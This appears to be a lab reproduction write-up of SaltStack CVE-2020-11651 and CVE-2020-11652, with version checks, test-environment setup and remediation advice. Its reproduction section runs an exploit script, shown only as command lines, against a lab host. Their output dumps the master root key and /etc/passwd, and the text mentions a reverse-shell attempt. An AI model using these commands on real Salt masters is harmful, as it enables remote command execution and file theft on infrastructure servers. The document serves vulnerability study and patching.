I. Vulnerability description

SaltStack is a Python-based configuration management tool with a client/server (master/minion) architecture. It is a centralized management platform for server infrastructure, providing configuration management, remote execution, monitoring and other functions. It is built on the lightweight ZeroMQ message queue and Python third-party modules (PyZMQ, PyCrypto, Jinja2, python-msgpack, PyYAML, etc.).

CVE-2020-11651 is an authentication bypass: an attacker can send crafted requests that bypass the Salt Master's authentication logic and invoke functions that should require authentication, which leads to remote command execution. CVE-2020-11652 is a directory traversal: an attacker can read arbitrary files on the server by sending crafted requests.

II. Affected versions and fixed versions

Affected versions

SaltStack < 2019.2.4

SaltStack < 3000.2

Fixed versions

2019.2.4

3000.2
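Added example (not from the original post): a small check that classifies a Salt version against the two fixed releases listed above, which is awkward to do by eye because Salt switched from year-based numbers (2019.2.x) to 3000.x. It assumes `salt-master --version` prints a line such as `salt-master 3000.1`.

```python
import re
import subprocess

# Fixed releases from the advisory: 2019.2.4 and 3000.2.
FIXED_2019_BRANCH = (2019, 2, 4)
FIXED_3000_BRANCH = (3000, 2)


def parse_salt_version(text):
    """Extract the numeric Salt version from strings such as
    'salt 2019.2.3 (Fluorine)' or '3000.1' as a tuple of ints."""
    m = re.search(r"(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError("no version number in %r" % text)
    return tuple(int(p) for p in m.group(1).split("."))


def is_vulnerable(text):
    """True if the version predates the fixes for CVE-2020-11651/11652.
    Versions >= 3000 are compared against 3000.2, everything older
    (2019.2.x, 2018.3.x, ...) against 2019.2.4."""
    v = parse_salt_version(text)
    if v >= (3000,):
        return v < FIXED_3000_BRANCH
    return v < FIXED_2019_BRANCH


def local_master_status():
    """Run `salt-master --version` on this host (assumed output format:
    'salt-master <version>') and classify it.
    Returns (version_string, vulnerable), or None if Salt is not installed."""
    try:
        out = subprocess.run(["salt-master", "--version"],
                             capture_output=True, text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        return None
    return out.strip(), is_vulnerable(out)


if __name__ == "__main__":
    status = local_master_status()
    if status is None:
        print("salt-master not found on this host")
    else:
        ver, vuln = status
        print(ver, "-> VULNERABLE, upgrade" if vuln else "-> patched")
```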

III. Environment setup

Manual environment setup

SaltStack package mirror: mirrors.nju.edu.cn/saltstack/2…

1. Download and import the repository key

wget -O - https://repo.saltstack.com/apt/ubuntu/16.04/amd64/2019.2/SALTSTACK-GPG-KEY.pub | sudo apt-key add -

2. Save the following line as /etc/apt/sources.list.d/saltstack.list

deb http://repo.saltstack.com/apt/ubuntu/16.04/amd64/2019.2 xenial main

3. Run:

sudo apt-get update

4. Install the Salt packages

sudo apt-get install salt-master
sudo apt-get install salt-minion
sudo apt-get install salt-ssh
sudo apt-get install salt-syndic
sudo apt-get install salt-cloud
sudo apt-get install salt-api

5. Restart the service

sudo systemctl restart salt-minion

Installation succeeded

Docker image method:

docker pull vulfocus/saltstack-cve_2020_11651

Pulling the image

Running successfully

IV. Reproducing the vulnerability

python3 exp.py -m 192.168.0.102

Reading the root_key

Command execution succeeded

Reading /etc/passwd

python3 exp.py -m 192.168.0.102 -c master -r /etc/passwd

The Docker image does not ship enough tooling for an nc reverse shell; after several attempts it did not work. The commands above are sufficient for reading files and related operations.

Fetching the root_key and reading /etc/passwd still work.

Full session transcript:

root@kali:~# python3 exp.py -m 192.168.0.102
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
[+] Checking salt-master (192.168.0.102:4506)
Checking salt-master status...
[+] Read root_key...
root key: 5a4RAt+lafu37VuU6eiT8Ygcegu9VErP7DQaJxb7JxCgW/50yvp9DgYKAG0HtyxXqzVwAMnoJAo=
root@kali:~# python3 exp.py -m 192.168.0.102 -c master -r /etc/passwd
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
[+] Checking salt-master (192.168.0.102:4506)
Checking salt-master status...
[+] Read root_key...
root key: 5a4RAt+lafu37VuU6eiT8Ygcegu9VErP7DQaJxb7JxCgW/50yvp9DgYKAG0HtyxXqzVwAMnoJAo=
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Got response for attempting master shell: {'jid': '20200505175322193300', 'tag': 'salt/run/20200505175322193300'}. Looks promising!

V. Remediation

1. Upgrade SaltStack to a fixed version. Back up a snapshot of the data before upgrading.

2. Configure SaltStack to update automatically so that patches are applied promptly.

3. Restrict access to the Salt Master's listening ports (4505 and 4506 by default): do not expose them to the public network, or open them only to trusted hosts.



thelostworld
